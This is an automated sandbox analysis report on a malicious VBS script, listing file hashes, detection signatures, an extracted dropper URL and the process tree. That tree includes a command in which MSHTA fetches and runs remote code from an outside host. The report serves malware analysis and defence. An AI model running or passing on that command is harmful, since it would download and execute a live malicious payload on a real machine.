Analysis
max time kernel: 45s
max time network: 49s
platform: windows7_x64
resource: win7-20220715-en
resource tags: arch:x64 arch:x86 image:win7-20220715-en locale:en-us os:windows7-x64 system
submitted: 09-08-2022 18:31
Static task
static1
Behavioral task
behavioral1
Sample
DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource
win7-20220715-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
DWRNHNKWSJEHWYPNYOGGOP.vbs
Resource
win10v2004-20220721-en
11 signatures
150 seconds
General
Target: DWRNHNKWSJEHWYPNYOGGOP.vbs
Size: 1KB
MD5: 43f89bd927a7e80c8240c61617dee7bf
SHA1: 6a8ab5c11c1afd276cf5dbb7b125cff26080459f
SHA256: f835187e4e7703e00b2da9f5cca7b9a4ab87d26d27b09e5112d563f6f96dcc9a
SHA512: f637d2cdbd59a730b65c770d66c2767febe5f9e8662d133717922990fbf3934a4026b5929960c8dfbfdb228cf164b9390badbc92b19dde11f9ebe5a1018379e4
Score: 10/10
Malware Config
Extracted
Language
hta
Source
URLs
hta.dropper
https://tradeguru.com.pk/enc2.txt
Signatures
Process spawned unexpected child process (1 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
MSHTA.EXE
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 1552 | 1648 | MSHTA.EXE |
Blocklisted process makes network request (4 IoCs)
Processes:
MSHTA.EXE
flow | pid | process
4 | 1552 | MSHTA.EXE
5 | 1552 | MSHTA.EXE
6 | 1552 | MSHTA.EXE
7 | 1552 | MSHTA.EXE
Processes:
MSHTA.EXE
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3440072777-2118400376-1759599358-1000\Software\Microsoft\Internet Explorer\Main | MSHTA.EXE
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DWRNHNKWSJEHWYPNYOGGOP.vbs"
C:\Windows\system32\MSHTA.EXE
MSHTA.EXE https://tradeguru.com.pk/enc2.txt
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies Internet Explorer settings